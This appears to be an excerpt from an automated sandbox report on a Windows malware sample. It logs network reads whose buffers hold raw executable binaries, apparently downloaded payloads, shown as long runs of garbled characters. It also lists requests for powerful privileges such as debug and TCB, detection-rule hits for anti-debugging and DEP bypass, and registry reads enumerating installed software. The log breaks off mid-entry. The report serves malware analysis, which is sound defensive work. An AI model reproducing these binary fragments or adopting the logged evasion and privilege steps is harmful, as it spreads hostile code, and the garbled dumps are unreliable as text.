ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéƒ#ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Š½@ÊÎÜ.™ÎÜ.™ÎÜ.™Ú·-˜ÞÜ.™Ú·+˜wÜ.™¢¨+˜ŸÜ.™¢¨*˜ÜÜ.™¢¨-˜ÔÜ.™¨&˜ÏÜ.™Ú·*˜ÖÜ.™Ú·(˜ÏÜ.™Ú·/˜ÙÜ.™ÎÜ/™7Ü.™¨*˜ÉÜ.™¨+˜ßÜ.™¨Ñ™ÏÜ.™Îܹ™ÏÜ.™¨,˜ÏÜ.™RichÎÜ.™PELlݎcà ˆˆ³f @`@tF ð(ÐÐЁÚ8ÀÛÈÚ@  .text*, `.xjneqsmŠZ@\0 `.rdata2¸ ºŒ@@.dataäw`.F@À.xjneqsmPàt@À.rsrc(ÐðÒv@@.relocЁÐ‚H@BU‹ìj¹(ŒTèqQ ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìj¹,ŒTèQQ ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìj¹4±Tè1Q ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìèˆÈ £±T]ÃÌU‹ìèxÈ £±T]ÃÌU‹ìj¹³TèñP ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh<&R¹ð²Tè¾F h€6QèŸMƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh$&R¹²TèŽF h6QèoMƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh4&R¹Ø²Tè^F h 6Qè?MƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh(&R¹¨²Tè.F h°6QèMƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh0&R¹À²TèþE hÀ6QèßLƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿhbQd¡PƒìD¡DiT3ÅPEôd£Ç³T@Æ ³Th%Rh&REìPè÷ ƒÄ PM°èËÖ ÇEüMàQU°RMäèôM ‹HQ‹R¹³TèÓ* ÆEühðULjj0E°PèÐHÇEüÿÿÿÿhÐ6Qè'LƒÄ‹Môd‰ Y‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìj¹ ¸Tè!O ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhàHR¹ð·TèîD hð6QèÏKƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhIR¹Ø·Tè¾D h7QèŸKƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhHIR¹¨·TèŽD h7QèoKƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhx4R¹À·Tè^D h 7Qè?KƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh`4R¹H·Tè.D h07QèKƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhp4R¹·TèþC h@7QèßJƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhd4R¹`·TèÎC hP7Qè¯JƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhl4R¹x·TèžC h`7QèJƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì(¸kÈŠ‘,9RˆUظÁàŠˆ89RˆMÙºk ŠˆD9RˆMÚºk ŠˆP9RˆMÛºk¾ˆ\9RƒùOt.ºk¾ˆh9RƒùNtºk¾ˆt9RƒùDtÆEÿ0ëÆEÿ1ŠUÿˆUܸkȾ‘€9RƒúJu0¸ÁྈŒ9RƒùauºÑ⾂˜9Rƒønu ÆEó1é=¹kѾ‚¤9RƒøFu ÆEô2é¹kѾ‚°9RƒøMu0¹Áᾑ¼9Rƒúau¸ÑྈÈ9Rƒùru ÆEõ3éкk¾ˆÔ9RƒùAuºÁ⾂à9Rƒøpu ÆEö4陹kѾ‚ì9RƒøMu0¹Áᾑø9Rƒúau¸Ñྈ:Rƒùyu ÆE÷5éOºk¾ˆ:RƒùJu0ºÁ⾂:Rƒøuu¹Ñᾑ(:Rƒúnu ÆEø6é¸kȾ‘4:RƒúJu0¸Áྈ@:RƒùuuºÑ⾂L:Rƒølu ÆEù7黹kѾ‚X:RƒøAu¹Áᾑd:Rƒúuu ÆEú8鄸kȾ‘p:RƒúSuÆEû9ëd¸kȾ‘|:RƒúOuÆEü0ëD¸kȾ‘ˆ:RƒúNuÆEý1ë$¸kȾ‘”:RƒúDuÆEþ2ëÆEþ?ŠEþˆEýŠMýˆMüŠUüˆUûŠEûˆEúŠMúˆMùŠUùˆUøŠEøˆE÷ŠM÷ˆMöŠUöˆUõŠEõˆEôŠMôˆMóŠUóˆUݸÁྈ :Rƒù0|ºÁ⊂¬:RˆEòëÆEò0ŠMòˆMÞºkŠˆ¸:RˆMߺkŠˆÄ:RˆMàºÁ⊂Ð:RˆEá¹kÑŠ‚Ü:RˆEâ¹Áኑè:RˆUã¸kÈŠ‘ô:RˆUä¸kÈŠ‘;RˆUåMñè£: PEæPMØQMèè"H ‹PR‹P¹¸Tèý hp7QèrFƒÄ‹å]ÃU‹ìhP;R¹0·Tèn? h€7QèOFƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhàQR¹Ì¸Tè>? h7QèFƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhÈQR¹l¸Tè? h 7QèïEƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhØQR¹´¸TèÞ> h°7Qè¿EƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhÌQR¹„¸Tè®> hÀ7QèEƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhÔQR¹œ¸Tè~> hÐ7Qè_EƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì¹è¸TèŒ hà7Qè4EƒÄ]ÃÌÌÌÌU‹ìhXnR¹ÈºTè.> hð7QèEƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh@nR¹hºTèþ= h8QèßDƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhPnR¹°ºTèÎ= h8Qè¯DƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhDnR¹€ºTèž= h 8QèDƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhLnR¹˜ºTèn= h08QèODƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhpR¹@»Tè>= h@8QèDƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhxpR¹àºTè= hP8QèïCƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhˆpR¹(»TèÞ< h`8Qè¿CƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh|pR¹øºTè®< hp8QèCƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh„pR¹»Tè~< h€8Qè_CƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhuR¹¸»TèN< h8Qè/CƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhètR¹X»Tè< h 8QèÿBƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhøtR¹ »Tèî; h°8QèÏBƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhìtR¹p»Tè¾; hÀ8QèŸBƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìhôtR¹ˆ»TèŽ; hÐ8QèoBƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $cìÍ'£U'£U'£U“RU*£U“PUª£U“QU?£U†ú^U%£U†ú§T5£U†ú T0£U†ú¦T £U.õ U-£U.õ0U"£U'¢UЍ£UÕú¦T£UÕú£T&£UÕú\U&£UÕú¡T&£URich'£UPEL·°´aà b €B€@°@Á44< ø߀X(ÌûTh¢@€ Ü .textú`b `.rdatat €¢f@@.data8]0@À.didat`@À.rsrcøß à@@.relocX(€*ú@Bh>CèâÃÌÌÌÌÌhpBè“-YÃÌÌÌÌèyZ£ÈÏCÃÌÌÌÌ̹ØÏCéìhÌÌÌÌÌ̹àÔCèÌh pBèY-YÃÌÌÌÌÌÌÌÌÌ̹˜àEè,Gh°pBè9-YÃÌÌÌÌÌÌÌÌÌ̹+Eé ÌÌÌÌÌ̹0+Eè)hÀpBè -YÃÌÌÌÌÌÌÌÌÌ̹¢QFèÜFhÐpBèé,YÃÌÌÌÌÌÌÌÌÌ̹*Eè¼FhàpBèÉ,YÃÌÌÌÌÌÌÌÌÌ̹˜+EèQhðpBè©,YÃÌÌÌÌÌÌÌÌÌÌU‹ìì,EüVPÿdF…Àu`‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜP‰MàÇEìA‰Mð‰MôÿTF‹ð…öt)SÿuVÿXF‹Mü…ÀVQ•Ã‹‹r‹Îÿ ‚Bÿ֊Ã[ë2À^ÉÂ̶D$ Pÿt$ ÿt$ ÿ4‘FPÿ0‘F ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿ4‘FPÿ@‘F U‹ìƒ} 0tY} u]ŠE ¹0+E$¶ÀPÿuÿuè77öE t>ÿuÿ(‘F…Àt1h!0Pÿ4‘F…Àt!öE thD…BPÿ,‘Fë ÿu¹0+EèÌ62À]¸"oBè(QV‹ñ‰uð蘃eüŽ³è‚VŽ|³ÆEüèsVŽÜ³ÆEüèdVŽ<´ÆEüèUVŽœ´ÆEüèFV‹ÎÆEüèÅ‹Mô‹Æ^d‰ ÉÃU‹ìd¡jÿh.oBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6è¢Fÿ6èÎsY‹Môd‰ ^ÉÃÌÌÌÌÌé®ÿÿÿÁ<´é±V¸ èã'SUVWjjÿ´$( èú‹Œ$ ‹ØèJW½颍D$Pèø$‹ð·Qè¿#€¼$ t „Àt3Àf‰ë„ÀtUh@…BD$PèþTjjD$‹ûP蔋ðfƒ>*u:·NQèt#„Àt,j.Xj\f‰„$XUf‰„$„$SPèÛT¼$ÿ´$( WVèÙ„Àu'‹Œ$ D$UPèQV„À…Dÿÿÿ_^][Ä °ëïU‹ìVjÿu‹ñÿuÿu †|³Pèàþÿÿ„Àt°ë,€}t$ƒ¾ô³tjÿu†Ü³ÿuÿu Pè²þÿÿ„ÀtÒ2À^]ÂV‹ñèt3ÀŽ³f‰†ú’f‰†£f‰†ð’‰†ô’ˆ†ø’èÑUŽ|³èÆUŽÜ³è»UŽœ´è°UŽ<´è¥UŽpq^é´QQSUV‹t$(W‹ù…öt ƒ|$0v3Àf‰‹L$3ÛCSjŠñi(ˆD$‹Ïÿt$‰l$ Uèùþÿÿ„Àu4Ç³‹Ï‰|$èWU‹Ïëÿt$$UWè„Àu‹L$Cè±T‹ø…ÿuá3À_^][YY‹l$ …ítÿt$WèS÷ØÀþÀˆE…öt ÿt$0WVè#S‹ÃëÉV‹ñƒ>t ÿ6è!qƒ&Yƒfƒf^ËT$V‹t$W‹|$…öt¶¶Â3ÈÁê3>CGƒîuè_‹Â^ V‹t$3À9Fu(Wj‹È_‹ÑÑêöÁ‹Êtñ ƒ¸íƒïuê‰ †@=rÚ_^ÂU‹ìƒìLÿuM´èu‹Môƒùs ‹E ‰D´ÿEôM´è]ÉÂU‹ìƒìLÿuM´èF‹Môƒùs‹E ‰D´‹MôA‰Môƒùs ‹E‰D´ÿEôM´èÛ\É 3ÀÇA‰‰Af‰A ‹ÁÃVW‹ñ¸D…BjY‹þó«j 3ÿF WPè(4‹D$ƒÄ ‰~@‰~D‰FH‹Æ_^ÂVÿt$‹ñjè7ÿÿÿj‹Îèî^Âj èã‹D$ÆÂV‹ñ€~ uèÿt$ ÿt$ è†_„ÀuÆF ë2À^ÂV‹ñ€~ uÿt$j èÚþÿÿ‹ÎèÛj‹ÎèŠ^ÂVÿt$ ‹ñÿt$ j èãþÿÿ‹Îèµj ‹Îèd^ÂéU‹ììEPjÿu …øÿÿhP薃č…øÿÿPjègþÿÿ‹MègÉÃÿ€B…Àt$jÿt$ ÿt$ hPjhÿ€B…À•Àë2ÀÂV‹ñè j‹Îè^ÃU‹ìƒìLV‹ñM´jèŠþÿÿM´èD[j‹Îè³^ÉÃV‹ñèèXÿt$ ÿt$ jèþÿÿ‹ÎèÚj‹Îè‰^Âÿt$jèÊÿÿÿÂVÿt$‹ñjè j ‹Îè$^ÂVÿt$ ‹ñÿt$ j è¹ýÿÿ‹Îè‹j ‹Îè:^Âÿt$jèÏÿÿÿÂV‹ñ€~ uÿt$j èTýÿÿ‹ÎèUj‹ÎèÈ^‹T$‹Âƒètƒèt&ƒèt-üuƒ9u‰ÿAƒ9 tõÇëíƒ9tƒ9uãÇëہì$hPè‡þÿÿ„Àt]SUWj [j ]|$ V·f;Ãtf;ÅuƒÇëîf…Àt4SWè6‹ðYY…öuUWè6‹ðYY…öt3Àf‰ƒÆWjèüÿÿ‹þ…öuµ^_][ÄÃU‹ìQV‹uþÿu €yu^ÉÂVèÿÿÿhèCEü‰uüPèí6Ìÿt$ÿt$j!èiüÿÿj¹+EèîþÿÿÂVÿt$ ‹ñÿt$ è j‹Îè–ÿÿÿ^ÂVÿt$ ‹ñÿt$ j è+üÿÿ‹Îèýþÿÿj‹Îè¬þÿÿ^¸˜^CÃU‹ìÿuÿuÿuÿu ÿuèãÿÿÿÿpÿ0è)ƒÄ…ÀyƒÈÿ]ÃIÿ3Àf‰A2ˆA ‰AˆA‰4ˆA0f‰A$‰A‰A(‰A,‹ÁÇH…BfÇAÆAÇA Ã3À‰‰‰‰‰ ‰$‹ÁÃU‹ìd¡jÿh.oBPd‰%ƒyÿÇH…Bt€yu€ytè~ëèI‹Môd‰ ÉÃÌÌÌÌÌÌÌÌÌÌÌÌÌV‹ñè£ÿÿÿöD$t h8Vè YY‹Æ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌSV‹ñ³ƒ~ÿt"€~uƒ~uÿvÿ,€BXÿ÷ÛÛþÃNÿƒf„Ûu8^tF2¹+EPèûÿÿ^ŠÃ[øèXS‹œ$ UVW‹û‹ñÑïöÃu €~0u3íë3íE‹„$ƒ÷ÁçP‰^ Ç@èd·ƒø.tƒ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¢Éžà 0¤†µ à@  @…4µOà, µ  H.textÜ  ¤ `.rsrc,à¨@@.reloc ¸@BhµHô»$ùE0 us# ~ç%-&~æþ¾s$ %€ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢(  o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/   ,rãprp~( () +;rprap~( () o/ -{å(+ {å( (0 þ  9~o1   (2 o3 o4 (5 {å(   (0 þ  95þ¶s6 ~è%-&~æþ¿s7 %€è(+þ·s6 ~é%-&~æþÀs7 %€é(+þ¸s6 ~ê%-&~æþÁs7 %€ê(+oÙ oÛþ¹s8 ~ë%-&~æþÂs9 %€ë(+oÝoãþºs: ~ì%-&~æþÃs; %€ì(+oßþ»s< ~í%-&~æþÄs= %€í(+oá(+,[så%oÙ% rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ% r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ, oB (C :üÿÿÞþo Üo :áûÿÿÞ ,o ÜÞ&Þ+*Adå( µˆ=4&Z ah0’s?  h%ÐÏ(D sE (F (G þ , ÝS( s¦h%У(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+r‘poo(I - o+r‘poo(I - o+r‘poÜor‘p(J   , oK Xo¥þ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0ÇsL (F (G þ , ݞ( s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!‘¶Yoñ%o«oH oó%o«(oõoðjþ,-(N    (O   (P !€µ÷õŸYoñÞ&Þ-+(ô(I þ  , oQ Xo¥þ  :®þÿÿÞ&ÞÞ Þ+*AL` i-„±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA( s¦h%З(D sE o©&8àh%Ь(D sE o§oH h%Ч(D sE oR -h%ÐÒ(D sE oR +  , (s×  h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ  , oS Xo¥þ  : ÿÿÿÞ ÞÞÞ+*ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý( s¦r¡pr p~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ œXxª°@@ðOà& àCODEšœ `DATA´° @ÀBSSá дÀ.idata&à´@À.edataOðÄ@P.relocàÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@|:@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øé©KƒD$øéÇKƒD$øéÑKÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @¤<@8\@D\@¸<@¬<@T\@@:@|:@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖAƒ=ÖAt@¸‹ÖA3ɉL‚ô@=uìÇEüÖA‹Eü‹Uü‰P‹Eü‹Uü‰‹Eü£ÖAƼÕA3ÀZYYd‰hó@€=EÐAt hÄÕAè!÷ÿÿÃéƒ#ëå ¼ÕAY]ÐU‹ìƒ
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTrustedCredManAccessPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: 7-Zip
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Adobe AIR
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000330
key_handle: 0x0000032c
options: 0
access: 0x00020019
